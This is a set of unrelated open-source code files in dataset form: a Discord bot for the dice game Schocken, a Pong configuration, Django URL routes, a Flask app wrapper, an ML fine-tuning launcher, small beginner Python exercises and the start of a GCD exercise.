halbzeit.rdm.hoch_und_tief()\n naechster = halbzeit.aktiver_spieler\n out_str = self.gen_info_header(halbzeit, num_halbzeit)\n im_wievielten = {1: \"ersten\", 2: \"zweiten\", 3: \"dritten\"}\n\n hoch_1 = hoch.spieler.einsen\n tief_1 = tief.spieler.einsen\n out_str += f\"Hoch: {self.mention_mit_deckel(hoch.spieler)} \"\n out_str += f\"mit: {self.wurf_to_emoji(hoch.spieler.augen,einsen=hoch_1)} \"\n out_str += f\"im {im_wievielten[hoch.wurf_anzahl]}. \\n\"\n out_str += f\"Tief: {self.mention_mit_deckel(tief.spieler)} \"\n out_str += f\"mit: {self.wurf_to_emoji(tief.spieler.augen,einsen=tief_1)} \"\n out_str += f\"im {im_wievielten[tief.wurf_anzahl]}. \\n\"\n out_str += f\"Als nächstes ist {self.mention_mit_deckel(naechster)} \"\n out_str += f\"mit `!wuerfeln` dran. 
\"\n return out_str\n\n def gen_enter_halbzeit_output(self, spieler_liste, num_halbzeit):\n if num_halbzeit == 1:\n out_str0 = f\"**Halbzeit {num_halbzeit} beginnt. Die Reihenfolge ist:**\\n\"\n member_list = [self.name_to_member(sp.name) for sp in spieler_liste]\n out_str0 += \", \".join([m.mention for m in member_list])\n out_str0 += f\"\\n{member_list[0].mention} ist mit `!wuerfeln` dran.\"\n elif num_halbzeit == 2:\n out_str0 = f\"**Halbzeit {num_halbzeit} beginnt. Die Reihenfolge ist:**\\n\"\n member_list = [self.name_to_member(sp.name) for sp in spieler_liste]\n out_str0 += \", \".join([m.mention for m in member_list])\n out_str0 += f\"\\n{member_list[0].mention} ist mit `!wuerfeln` dran.\"\n elif num_halbzeit == 3:\n out_str0 = f\"** Das Finale beginnt. Die Reihenfolge ist:**\\n\"\n member_list = [self.name_to_member(sp.name) for sp in spieler_liste]\n out_str0 += \", \".join([m.mention for m in member_list])\n out_str0 += f\"\\n{member_list[0].mention} ist mit `!wuerfeln` dran.\"\n return out_str0\n\n def gen_runde_vorbei_output(self, halbzeit, num_halbzeit):\n verlierer = halbzeit.spieler_liste[0]\n verlierer_old = next(\n s for s in self.game_old.state.spieler_liste if s.name == verlierer.name\n )\n deckel = verlierer.deckel - verlierer_old.deckel\n verl_member = self.name_to_member(verlierer.name)\n out_str = f\"{verl_member.mention} verliert die Runde und bekommt \"\n deckel_emoji = self.emoji_by_name(\"kronkorken\")\n out_str += f\"{deckel} {deckel_emoji}.\\n\"\n out_str += self.gen_info_header(halbzeit, num_halbzeit, neue_runde=True)\n out_str += f\"Du bist mit `!wuerfeln` an der Reihe, \"\n out_str += f\"{self.mention_mit_deckel(verlierer)}.\"\n return out_str\n\n def gen_wuerfel_output(self, spieler, halbzeit, reicht_comment=False, einsen=0):\n max_wuerfe = halbzeit.rdm.num_maximale_wuerfe\n aus_der_hand = einsen == 0\n augen = spieler.augen\n wurf_emoji = self.wurf_to_emoji(augen, einsen)\n # besonderer wurf?\n augen_name = str(wurf.welcher_wurf(augen, aus_der_hand=aus_der_hand))\n\n if halbzeit != self.game.state:\n # hier rein, wenn halbzeit old reingegeben wurde\n spieler_old = self.spieler_by_name(spieler.name, halbzeit.spieler_liste)\n out_str = f\"{self.mention_mit_deckel(spieler_old)} wirft \"\n else:\n out_str = f\"{self.mention_mit_deckel(spieler)} wirft \"\n\n im_wievielten = {\n 1: \"im ersten\",\n 2: \"im zweiten\",\n 3: \"im dritten\",\n }\n im_wievielten.update({0: im_wievielten[max_wuerfe]})\n out_str += wurf_emoji + f\" {im_wievielten[spieler.anzahl_wuerfe]}. 
\"\n\n if \"Gemuese\" in augen_name:\n if augen[0] < 5:\n comment_choices = [\n \"Gar nicht mal so gut...\",\n \"Schlechtes Gemüse...\",\n \"Das kannst du besser!\",\n \"Wow.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Aber reicht sogar.\"],\n \"reichtnicht\": [\" Und reicht nicht mal.\"],\n }\n\n elif augen[0] == 5:\n comment_choices = [\n \"Das kann man noch schlagen.\",\n \"Ausbaufähig...\",\n ]\n reicht_choices = {\n \"reicht\": [\" Aber reicht sogar.\"],\n \"reichtnicht\": [\" Und reicht nicht mal.\"],\n }\n\n elif augen[0] == 6:\n comment_choices = [\n \"Hohes Gemüse.\",\n \"Nicht schlecht!\",\n ]\n reicht_choices = {\n \"reicht\": [\" Und reicht sogar.\"],\n \"reichtnicht\": [\" Aber reicht gar nicht.\"],\n }\n\n elif \"General\" in augen_name:\n comment_choices = [\"Kann man liegen lassen.\", \"General.\"]\n reicht_choices = {\n \"reicht\": [\" Reicht ja.\"],\n \"reichtnicht\": [\" Aber reicht gar nicht.\"],\n }\n\n elif \"Straße\" in augen_name:\n if augen[-1] == 1:\n comment_choices = [\n \"Da is' ne 1 dabei.\",\n \"Keine schöne Straße.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Aber würde reichen.\"],\n \"reichtnicht\": [\" Reicht ja nicht mal\"],\n }\n\n else:\n comment_choices = [\n \"Straße.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Reicht.\"],\n \"reichtnicht\": [\" Reicht ja nicht mal\"],\n }\n\n elif \"Schock\" in augen_name:\n if \"out\" in augen_name:\n comment_choices = [\n \"Nice.\",\n \"Random Schock Out.\",\n \"Würde ich liegen lassen.\",\n ]\n reicht_choices = {\n \"reicht\": [\" Reicht.\"],\n \"reichtnicht\": [\" Aber reicht ja nicht mal.\"],\n }\n else:\n comment_choices = [\"Schöner Schock.\"]\n reicht_choices = {\n \"reicht\": [\" Reicht auch.\"],\n \"reichtnicht\": [\" Aber reicht gar nicht.\"],\n }\n\n elif \"Herrenwurf\" in augen_name:\n comment_choices = [\"Herrenwurf. 
Verliert nicht.\"]\n reicht_choices = {\n \"reicht\": [\" Und reicht sogar.\"],\n \"reichtnicht\": [\" ...aber diesmal vielleicht schon.\"],\n }\n\n elif \"Jule\" in augen_name:\n comment_choices = [\"Schöne Jule.\"]\n reicht_choices = {\n \"reicht\": [\" Und sie reicht.\"],\n \"reichtnicht\": [\" Aber reicht leider nicht.\"],\n }\n\n out_str += f\"\\n{random.choice(comment_choices)}\"\n\n if reicht_comment:\n hoch, tief = halbzeit.rdm.hoch_und_tief()\n reicht = tief.spieler.name != spieler.name\n if reicht:\n out_str += random.choice(reicht_choices[\"reicht\"])\n else:\n out_str += random.choice(reicht_choices[\"reichtnicht\"])\n\n return out_str\n","repo_name":"papr/schocken","sub_path":"src/schocken/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":33938,"program_lang":"python","lang":"de","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"31284505849","text":"screen_data = {\r\n 'SCREEN_WIDTH': 1500,\r\n 'SCREEN_HEIGHT': 800,\r\n 'SCREEN_BGCOLOR': 'black',\r\n 'SCREEN_TITLE': 'Pang Pong',\r\n 'VERT_SPACE_CUT': 125,\r\n 'HOR_SPACE_CUT': 200,\r\n 'PADDLE_FROM_SIDE_DISTANCE': 30\r\n}\r\n\r\nscoreboard_data = {\r\n 'FIELD_COLOR': 'yellow',\r\n 'FIELD_OUTLINE_SIZE': 5,\r\n 'TOP_LEFT': (-screen_data['SCREEN_WIDTH']/2 + screen_data['HOR_SPACE_CUT'],\r\n screen_data['SCREEN_HEIGHT']/2 - screen_data['VERT_SPACE_CUT']),\r\n\r\n 'TOP_RIGHT': (screen_data['SCREEN_WIDTH']/2 - screen_data['HOR_SPACE_CUT'],\r\n screen_data['SCREEN_HEIGHT']/2 - screen_data['VERT_SPACE_CUT']),\r\n\r\n 'BOT_LEFT': (-screen_data['SCREEN_WIDTH']/2 + screen_data['HOR_SPACE_CUT'],\r\n -screen_data['SCREEN_HEIGHT']/4 - screen_data['VERT_SPACE_CUT']),\r\n\r\n 'BOT_RIGHT': (screen_data['SCREEN_WIDTH']/2 - screen_data['HOR_SPACE_CUT'],\r\n -screen_data['SCREEN_HEIGHT']/4 - screen_data['VERT_SPACE_CUT']),\r\n 'BOARD_COLOR': 'white',\r\n 'SCORE_COLOR': 'red',\r\n 'BOARD_ADJUST': 40,\r\n 'BOARD_CENTER_TEXT_X': 0,\r\n 'BOARD_FONT': 'Arial',\r\n 'BOARD_FONT_SIZE': 36,\r\n 'WINNING_FONT_SIZE': 24,\r\n 'BOARD_FONT_TYPE': 'bold',\r\n 'BOARD_ALIGN': 'center',\r\n 'MAX_SCORE': 7\r\n}\r\n\r\npaddle_data = {\r\n 'PADDLE_SIZE': (8, 1),\r\n 'PADDLE_COLOR': 'white',\r\n 'TOP_BOUNDARY': scoreboard_data['TOP_RIGHT'][1],\r\n 'BOT_BOUNDARY': scoreboard_data['BOT_RIGHT'][1],\r\n 'PADDLE_STARTX': scoreboard_data['TOP_RIGHT'][0] - screen_data['PADDLE_FROM_SIDE_DISTANCE'],\r\n 'PADDLE_STARTY': 0,\r\n 'PADDLE_MOVEMENT': 45\r\n}\r\n\r\nball_data = {\r\n 'BALL_SPEED': 10,\r\n 'BALL_COLOR': 'red',\r\n 'TOP_BOUNDARY': scoreboard_data['TOP_RIGHT'][1],\r\n 'BOT_BOUNDARY': scoreboard_data['BOT_RIGHT'][1],\r\n 'RIGHT_BOUND_X': scoreboard_data['TOP_RIGHT'][0],\r\n 'LEFT_BOUND_X': scoreboard_data['TOP_LEFT'][0],\r\n 'START_POSITIONS': [40, 130, 220, 310],\r\n 'LEFT_BOT_CORNER_ANGLE': 225,\r\n 'LEFT_TOP_CORNER_ANGLE': 135,\r\n 'RIGHT_BOT_CORNER_ANGLE': 315,\r\n 'RIGHT_TOP_CORNER_ANGLE': 45,\r\n 'SUCCESS_SPEED_UP': 0.25\r\n}","repo_name":"SaadNasir92/PONG","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74641359316","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path('flowcharts/', views.FlowchartViewSet.as_view({'get': 'list'}), name='flowchart-list'),\n path('flowcharts//', views.FlowchartViewSet.as_view({'get': 'retrieve'}), name='flowchart-list'),\n path('locations/', views.LocationViewSet.as_view({'get': 'list'}), name='location-list'),\n\n # ------------------------------------------- Charts ---------------------------------\n path('incident_per_location/', views.incident_per_location, name='incident_per_location'),\n path('total_incident/', views.total_incident, name='total_incident'),\n path('incident_per_contingency/', views.incident_per_contingency, name='incident_per_contingency'),\n path('contingency-plans/', views.ContingencyPlanViewSet.as_view({'get': 'list'}), name='contingency-plans'),\n path('incident-per-month/', views.incident_per_month, name='incident-per-month'),\n\n # ---------------------------------- FlowCharts ----------------------------------------\n path('HistoryChange//', views.HistoryChangeViewSet.as_view({'get': 'retrieve'}), name='history-change-detail'),\n path('flowchart-utility/', views.flowchart_utility, name='flowchart-utility'),\n\n # ---------------------------------- ScreenShot ----------------------------------------\n path('screenshot/', views.ScreenViewSet.as_view({'post': 'create'})),\n path('screenshot//', views.ScreenViewSet.as_view({'get': 'retrieve'})),\n\n\n\n]","repo_name":"amirreza-ghaffari/js_test","sub_path":"flowchart/api/v1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"69805803797","text":"# -*- coding: utf-8 -*-\n\nimport os, sys, traceback, hmac, hashlib, time\nimport flask\nfrom flask import Flask, Blueprint, request, g, json, jsonify, after_this_request\nfrom ..core.env import config, logger, logging\nfrom .exceptions import MeleeHTTPException, BadRequest, SignatureError, ServerError\n\nclass MeleeApp(object):\n\n def __init__(self, import_name):\n self.import_name = import_name\n self.app = Flask(import_name)\n\n self.logger = logging.getLogger('%s.api' % config.servicename)\n self.app.log = self.logger\n self.app.before_request(self.before_request)\n self.app.after_request(self.after_request)\n self.app.teardown_request(self.teardown_request)\n self.app.register_error_handler(Exception, self.error_handler)\n\n for code in [400, 401, 402, 403, 404, 405, 406, 408, 409, 410, 411, 412, 413, 414,\n 415, 416, 417, 418, 422, 428, 429, 431, 500, 501, 502, 503, 504, 505]:\n self.app.register_error_handler(code, self.error_handler)\n\n @self.app.route('/')\n def helloworld():\n # return flask.make_response(('wellcome to melee!', 200, None))\n return 'wellcome to melee!'\n\n self._init()\n\n logger.info('STARTUP', 'meleeapp %s created' % config.servicename)\n\n def _init(self):\n # init the rds sql connections\n self.rdsdb = None\n if config.rds_binds:\n app_config = {'SQLALCHEMY_BINDS': config.rds_binds}\n for k, v in config.rds_pool_config.iteritems():\n app_config['SQLALCHEMY_%s' % k.upper()] = v\n self.app.config.update(app_config)\n from flask.ext.sqlalchemy import SQLAlchemy\n self.rdsdb = SQLAlchemy(self.app)\n logger.info('init SQLALCHEMY rds', config.rds_binds.keys(), app_config)\n\n def verify_signature(self, sig_kv, signature, content, timestamp):\n key = config.sigkey(str(sig_kv))\n if not key:\n return False\n rawdata = '%s%s'% (content, timestamp)\n if isinstance(content, unicode):\n rawdata = 
rawdata.encode('utf-8')\n sig = hmac.new(key, rawdata, hashlib.sha256).hexdigest().lower()\n return sig == signature.lower()\n\n def before_request(self):\n self.logger.info('REQUEST', '%s?%s' % (request.path, request.query_string), request.endpoint, request.data or request.values.to_dict(), request.headers.get('User-Agent'))\n g.endpoint = request.endpoint.split('.')[-1] if request.endpoint else None\n g.rawdata = request.data\n g.jsondata = {}\n if request.endpoint is None:\n return\n g.startms = int(time.time()*1000)\n\n content = request.values.get('content')\n signature = request.values.get('signature', '')\n sig_kv = request.values.get('sig_kv')\n timestamp = request.values.get('timestamp') or 0\n g.jsonpcallback = request.values.get('callback')\n\n if content:\n if not timestamp or (time.time()*1000)-int(timestamp) > 86400000:\n raise BadRequest(description='request expired %s' % timestamp)\n\n if not self.verify_signature(sig_kv, signature, content, timestamp):\n raise SignatureError(description='Signature Not Correct.')\n try:\n g.jsondata = json.loads(content)\n except:\n g.jsondata = {}\n\n if config.appids and g.jsondata.get('appid') not in config.appids:\n raise BadRequest(description='Reqeust appid error')\n\n\n def teardown_request(self, exc):\n if exc:\n self.logger.error('SHOULD_NOT_HAPPEN','teardown_request, has exception:%s'%(exc))\n\n def after_request(self, response):\n if request.endpoint is None:\n return response\n if response is None:\n return response\n\n g.request_cost = int(time.time()*1000) - g.startms\n\n if getattr(g, 'response_code', None) is None:\n code = response.status_code\n else:\n code = g.response_code\n\n # 支持jsonp, 解决ajax get 请求跨域问题\n #if g.jsonpcallback:\n #response.response = '%s(%s)' % (g.jsonpcallback, response.response)\n response.headers['Access-Control-Allow-Origin'] = '*'\n\n self.logger.info('REQUEST', request.remote_addr, request.method, g.request_cost,\n '%s?%s' % (request.path, request.query_string), request.headers.get('Content-Length', '0'), g.jsondata, \n response.status_code, code, response.response, str(response.headers.get('Content-Length', '0')))\n\n return response\n\n def error_handler(self, error):\n self.logger.error('EXCEPTION', sys.exc_info()[1])\n self.logger.error('TRACEBACK', traceback.format_exc())\n \n if isinstance(error, MeleeHTTPException):\n g.response_code = error.code\n return jsonify(meta=error.info)\n else:\n error = ServerError(description=getattr(error, 'message', error.__class__.__name__))\n g.response_code = error.code\n return jsonify(meta=error.info)\n\n\n def mount(self, blueprints, prefix=None):\n \"\"\"bind the specific blueprints to the current flask app.\n :param blueprints: list, the list of blueprints\n :param prefix: dict, the url_prefix mapping definition for every blueprint\n Example Code:\n >>>blueprint = Blueprint('template', __name__, url_prefix='/test')\n >>>@blueprint.route('/foo')\n ...def foo():\n ... 
return jsonify('foo ok')\n ...\n >>>meleeapp.mount([blueprint], prefix={'template': '/template'})\n now you can access the url 'http://host:port/template/test/xxx'\n \"\"\"\n if not blueprints:\n return\n for b in blueprints:\n if prefix and b.name in prefix:\n url_prefix = '%s%s' % (prefix[b.name], b.url_prefix or '')\n else:\n url_prefix = b.url_prefix\n self.app.register_blueprint(b, url_prefix=url_prefix)\n self.logger.info('STARTUP', 'register blueprint %s: %s' % (b.name, url_prefix))\n\n\n def __call__(self, environ, start_response):\n \"\"\"Mark this MeleeApp as a WSGI App\n So all middleware that support WSGI protoal can run the instance of it.\n \"\"\"\n return self.app(environ, start_response)\n\n\n def runserver(self, arguments):\n # @self.app.route('/')\n # def helloworld():\n # # return flask.make_response(('wellcome to melee!', 200, None))\n # return 'wellcome to melee!'\n\n from werkzeug.serving import run_simple\n options = {}\n options.setdefault('use_reloader', True)\n options.setdefault('use_debugger', True)\n logger.info('STARTUP', 'meleeapp %s started' % config.servicename)\n run_simple(arguments['--host'], int(arguments['--port']), self, **options)\n\n\n def runtasklet(self, arguments):\n self.logger.debug(config.servicename, 'tasklets starting ...')\n from ..core.tasklet import TaskletManager\n tasklet_manager = TaskletManager.get(config.tasklets)\n tasklet_manager.startall()\n\n\n def initdb(self, arguments):\n self.logger.info(config.servicename, 'start intidb ...')\n # init rds db\n if config.rds_binds:\n self.logger.info(config.servicename, 'start init rdsdb ...')\n self.rdsdb.create_all()\n # init baiduyun lbs db\n if config.baiduyun_ak:\n self.logger.info(config.servicename, 'start init baiduyun tables ...')\n from ..baiduyun.lbs import LBSTable\n for c in LBSTable.__subclasses__():\n self.logger.info('init baiduyun table', c.__tablename__, c.init_schema(config.baiduyun_ak))\n # init mongodb multi clients index model db\n if config.mongodb_clients:\n self.logger.info(config.servicename, 'start init mongodb ...')\n from ..nosql.mongodb import BaseMongoMultiClientIndexModel\n def __createindex(__model):\n if __model.__subclasses__():\n for __submodel in __model.__subclasses__():\n __createindex(__submodel)\n else:\n __model.create_index()\n __createindex(BaseMongoMultiClientIndexModel)\n\n self.logger.info(config.servicename, 'end intidb')\n\n def run(self):\n usage = \"\"\"MeleeApp Running in Command-Line\n\n runserver: run the wsgiserver in one process\n runtasklet: run all tasklets defined in the config file in one parent process with subprocesses\n\n Usage:\n server.py runserver [--host=] [--port=]\n server.py runtasklet [--pythonpath=] [--chdir=]\n server.py initdb [--baiduyun]\n\n Options:\n -h --help Show this\n --host= the host used to run the server [default: 127.0.0.1]\n --port= the port used to run the server [default: 5000]\n --pythonpath= Add additonal python sys.path.\n --chdir= Chdir to specified directory before apps loading. 
\n\n \"\"\"\n\n from docopt import docopt\n arguments = docopt(usage)\n # process common command options\n self._process_cmd_options(arguments)\n\n if arguments['runserver']:\n return self.runserver(arguments)\n elif arguments['runtasklet']:\n return self.runtasklet(arguments)\n elif arguments['initdb']:\n return self.initdb(arguments)\n else:\n print(usage)\n raise RuntimeError('not supported command')\n\n def _process_cmd_options(self, arguments):\n if arguments['--pythonpath']:\n paths = arguments['--pythonpath'].split(',')\n for path in reversed(paths):\n if os.path.exists(path) and os.path.isabs(path):\n sys.path.insert(0, path)\n if arguments['--chdir']:\n os.chdir(arguments['--chdir'])\n\n\napp = MeleeApp(__name__)\n\n \n","repo_name":"leeyingmu/melee","sub_path":"melee/webhttp/wsgiapp.py","file_name":"wsgiapp.py","file_ext":"py","file_size_in_byte":10209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"25800836027","text":"\nimport os,sys\nsys.path.insert(0, '/home/madhu/work/codes')\nfrom main import check_endWith, check_create_dir, check_env, write_file, count_lines\n\n# import time, datetime\nfrom datetime import datetime\nimport TS_finetune_MP\n\n'''\n\nThis scripts does the model training. \n\nAn example call: \npython /home/madhu/work/codes/ML_codes/madhu_codes/TS_finetune_run_MP.py /home/madhu/work/class_outputs/p5_decoding_epitranscriptional_native_RNA_seq /home/madhu/work/ref_transcriptome/IVT_seq/IVT_seq.fa model_output__train_p5_m6A_3_512_1500_512_1__A/ 1 3 512 6 F 1500 512 1 A A1 |& tee /home/madhu/Logs/finetune__train_p5_m6A_3_512_1500_512_1__A.log\n\nInputs are: \nbasefolder, REF_GENOME, output_model_dir, TRAIN_epoch, layers, hidden_layers, cuda_id, F, lr, batch_size, downsampling_rate, METHYL_TYPE, TEST_CHR (optional)\n\n'''\n\nif __name__=='__main__' and '__file__' in globals():\n\n check_env('torch')\n\n\n startTime = datetime.now()\n current_time = startTime.strftime(\"%Y/%m/%d at %H:%M:%S\")\n print('\\n\\nThe script starting at: ' + str(current_time), ' \\n\\n' )\n\n ###############################################################################\n ###### The following needs to be updated #######\n # basefolder = '/home/madhu/work/class_outputs/p3_m6A_RNA_modification_native_RNA_seq'\n # TRAIN_epoch = 1\n # REF_GENOME = '/mnt/labshare/share/reference_genome/EpiNano_Reference_sequences/cc.fasta'\n\n basefolder = sys.argv[1]\n REF_GENOME = sys.argv[2]\n output_model_dir = sys.argv[3]\n TRAIN_epoch = int(sys.argv[4])\n # METHYL_TYPE = sys.argv[12]\n\n ###############################################################################\n\n # basefolder = '/home/qliu10/projects/TAD/analysis/ft_tfrecordguppy_v5.0.11//'; # revise\n # basefolder = '/home/madhu/work/analysis/p3_m6A_RNA_modification_native_RNA_seq'\n \n basefolder = check_endWith(basefolder)\n\n para_dict = {}\n para_dict['save_folder'] = basefolder + output_model_dir; # revise\n # para_dict['save_folder'] = '/home/qliu10/projects/TAD/analysis/testModelguppy_v5.0.11/'; # revise\n\n check_create_dir(para_dict['save_folder'])\n # if os.path.isdir( para_dict['save_folder'] ):\n # os.system('mkdir {}'.format( para_dict['save_folder'] ))\n\n para_dict['save_file_pref'] = 'BilstmMean.'+'layers'+sys.argv[5]+'.hs'+sys.argv[6]+'.'+sys.argv[8]+'.lr'+sys.argv[9]+'.b'+sys.argv[10]+(\".p\"+str(int(float(sys.argv[11])*1000+0.5)) if len(sys.argv)>7 else \"\")\n \n print(basefolder, para_dict['save_file_pref'])\n\n # 337,837\n para_dict['warmup_seq'] = 10000\n 
para_dict['save_frequency'] = 10000 ; #para_dict['warmup_seq']\n para_dict['log_frequency'] = 100 ; #para_dict['warmup_seq']//10\n \n # para_dict['train_epoch'] = 5\n para_dict['train_epoch'] = TRAIN_epoch; # revise\n para_dict['size_layers'] =int(sys.argv[5])\n para_dict['size_hidden'] =int(sys.argv[6])\n para_dict['METHYL_TYPE'] = sys.argv[12]\n\n print('The methyl type is: ', para_dict['METHYL_TYPE'])\n\n # para_dict['cpu_devices'] = 3; #\n para_dict['cuda_devices'] = 1;\n para_dict['cuda_id'] = sys.argv[7];\n # print('para_dict: ', para_dict['cuda_id'])\n para_dict['adam_learning_rate'] = int(sys.argv[9])/1e7\n para_dict['input_batch_size'] = int(sys.argv[10])\n if len(sys.argv)>11:\n para_dict['downsampling_rate'] = float(sys.argv[11])\n if para_dict['downsampling_rate'] < 1e-10:\n del para_dict['downsampling_rate']\n if 'downsampling_rate' in para_dict and para_dict['downsampling_rate']<0.03:\n para_dict['train_epoch'] = 1000\n del para_dict['downsampling_rate']\n \n if len(sys.argv)>14:\n para_dict['ft_learning_rate'] = float(sys.argv[14])\n para_dict['save_file_pref'] = para_dict['save_file_pref'] + \".ft\"+str(int(float(sys.argv[14])*1e7+0.5))\n if len(sys.argv)>15:\n para_dict['saved_model'] = sys.argv[15]\n\n # for DNA;\n #para_dict['length_thr'] = 1000\n # for RNA ## run on 2023/03/04 forget to comment this # revise\n para_dict['length_thr'] = 200\n\n # print(datetime.datetime.now())\n try:\n is_ft_t = (True if sys.argv[8] in [1, '1', 'T', 'True', 'true'] else False)\n ## The first one will have the label 0 and the second one 1. \n #datafs = [basefolder+'/FAH58492_MN17479/', basefolder+'/MN17273_FAH58548/']\n #datafs = [basefolder+'/MN17273_FAH58548/', basefolder+'/FAH58492_MN17479/']\n\n # datafs = [basefolder+'/GSM3528749/TFRec_bp_FT/', basefolder+'GSM3528750/TFRec_bp_FT/'] # revise\n datafs = [basefolder+'train/class_0/', basefolder+'train/class_1/'] # revise\n \n if len(sys.argv)>13:\n if len(sys.argv[13]) == 2:\n TS_finetune_MP.finetuneTrainer( para_dict = para_dict, datafolders=datafs, is_ft=is_ft_t, ref_seq_file=REF_GENOME, index_file=\"tfrecord.index\", random_seed=3, not_use_chr=sys.argv[13] )\n else:\n # print('(sys.argv[13]: ', sys.argv[13])\n # print('len(sys.argv[13]): ', len(sys.argv[13]))\n print('\\n\\n\\n****** The chromosome not to be used should only have the length: 2, such as U1 *******\\n\\n\\n')\n else:\n TS_finetune_MP.finetuneTrainer( para_dict = para_dict, datafolders=datafs, is_ft=is_ft_t, ref_seq_file=REF_GENOME, index_file=\"tfrecord.index\", random_seed=3 ); # revise\n \n # TS_finetune_MP.finetuneTrainer( para_dict = para_dict, datafolders=datafs, is_ft=is_ft_t, ref_seq_file=REF_GENOME, index_file=\"tfrecord.index\", random_seed=3, not_use_chr=['cc6m_2244_T7_ecorv'] )\n\n\n except Exception as e:\n print(traceback.format_exc())\n print(e)\n # print(datetime.datetime.now())\n # print(datetime.datetime.now())\n\n executionTime = (datetime.now() - startTime)\n current_time = datetime.now().strftime(\"%Y/%m/%d at %H:%M:%S\")\n print('\\n\\nThe script completed at: ' + str(current_time))\n print('Execution time: ' + str(executionTime), ' \\n\\n')\n\n\n","repo_name":"Madhurananda/my_current_work_draft","sub_path":"codes/ML_codes/madhu_codes/TS_finetune_run_MP.py","file_name":"TS_finetune_run_MP.py","file_ext":"py","file_size_in_byte":6168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36679642471","text":"def discount():\n if cash == \"cash3000\":\n print(price - 3000)\n elif cash == 
\"cash5000\":\n print(price - 5000)\n else:\n print(price)\n\nif __name__ == '__main__':\n price = float(input(\"가격을 입력하시오: \"))\n cash = input(\"cash3000, cash5000중 해당을 입력하시오: \")\n discount()","repo_name":"jihoo1018/dojang_project","sub_path":"statements/unit_13_할인쿠폰.py","file_name":"unit_13_할인쿠폰.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39592105476","text":"celular = 3209161848\ncontra = 1234\nsaldo = 4500\nop = \"s\" or \"S\"\nintentos = 3\n\nfor i in range (1,4):\n\n msg = int(input(\"Ingrese el número de celular: \\n \"))\n password=int(input(\"Digite los 4 digitos de su contraseña: \\n\"))\n\n if msg == celular and password == contra:\n\n while op == \"s\" or \"S\":\n print(f\"¡Bienvenido a nequi! \\n Su saldo es de: {saldo}\")\n select = int(input(\"Digite 1 para sacar dinero. \\nDigite 2 para enviar dinero. \\nDigite 3 para recargar dinero. \\nDigite 4 para salir. \\n\"))\n\n if select == 1:\n opcion = int(input(\"Digite 1 para sacar el dinero por cajero. \\nDigite 2 para punto fisico.\\n\"))\n if opcion == 1:\n print(f\"Su saldo actual es: {saldo}\")\n retiro = int(input(\"¿Cuanto desea retirar?\\n\"))\n if retiro > saldo:\n print(\"No tienes fondos para retirar.\")\n elif retiro <= saldo:\n saldo = saldo - retiro\n print(\"Su codigo es: 987654\")\n print(f\"Su saldo actual es {saldo}\")\n elif retiro < 2000:\n print(\"No te alcanza.\")\n elif opcion == 2:\n print(f\"Su saldo actual es: {saldo}\")\n retiro = int(input(\"¿Cuanto desea retirar?\\n\"))\n if retiro > saldo:\n print(\"No tienes fondos para retirar.\")\n elif retiro <= saldo:\n saldo = saldo - retiro\n print(\"Su codigo es: 987654\")\n print(f\"Su saldo actual es {saldo}\")\n elif retiro < 2000:\n print(\"No te alcanza.\")\n\n elif select == 2:\n print(f\"Su saldo actual es {saldo}\")\n numero = int(input(\"Ingrese el número de telefono al que desea enviar el dinero.\\n\"))\n valor = int(input(\"Ingrese el valor que desea enviar.\\n\"))\n if valor > saldo:\n print(\"No tienes fondos suficientes para enviar.\")\n elif valor <= saldo:\n saldo = saldo - valor \n print(f\"Usted ha enviado {valor} al número {numero}, le quedo un saldo de {saldo}\")\n\n elif select == 3:\n recarga = int(input(\"Ingrese el valor que desea recargar.\\n\"))\n preg = int(input(\"Digite 1 para realizar la recarga. De lo contrario digite 2\\n\"))\n if preg == 1:\n saldo = saldo + recarga\n print(f\"Su recarga ha sido realizada exitosamente, su saldo actual es {saldo}\")\n elif preg == 2: \n print(\"Ha cancelado la recarga.\")\n elif select == 4:\n print(\"Gracias por usar nequi.\")\n op = input(\"Si desea elegir otra opcion, escriba SI. De lo contrario escriba NO.\\n\")\n\n saldo = saldo -retiro\n\n else:\n intentos = intentos - 1\n print(f\"¡Upps! Parece que tus datos de acceso no son correctos, Tienes {intentos} intentos más\")\n \n if intentos == 0:\n print(\"Ha agotado todos sus intentos.\")","repo_name":"DavidM0208/Python","sub_path":"Nequi/acceso.py","file_name":"acceso.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"6276974739","text":"#\n# Abstract Algebra: Theory and Applications\n# Chapter 2, Programming Exercise #3\n#\n# Write a computer program that will implement the Euclidean algo-\n# rithm. 
The program should accept two positive integers a and b as input\n# and should output gcd(a, b) as well as integers r and s such that\n# gcd(a, b) = ra + sb.\n#\n# That function is [gcd_extended]\n#\n# The [gcd_core_recursive] and [gcd_core_nonrecursive] functions are alternative cores\n# that simply calculate the GCD of two numbers (they don't also return r and s). They\n# need to be plugged into the [create_gcd] function to generate the actual GCD implementation\n# However, only the [gcd_extended] function generates r and s values. The [create_gcd] function\n# which accepts the two cores simply returns the GCD and nothing else.\n#\n# The [inc], [dec] and [euclidean_division] functions are utility functions that are used both\n# by the GCD cores and the extended GCD function\n\n\n\nfrom __future__ import division\nimport unittest\nfrom math import sqrt\nfrom math import floor\nimport time\n\n############################################\n# #\n# U T I L I T Y F U N C T I O N S #\n# #\n############################################\n\ndef inc(n):\n return n+1\n\ndef dec(n):\n return n-1\n\n# If we want the gcd function to also work for negative numbers, we have to 'fix' integer division in Python\n# as they way it is implemented (for negative numbers) does not actually correspond to Euclidean division\n# What I am doing below is to define Euclidean division according to the Raymond T. Boute definition\n# 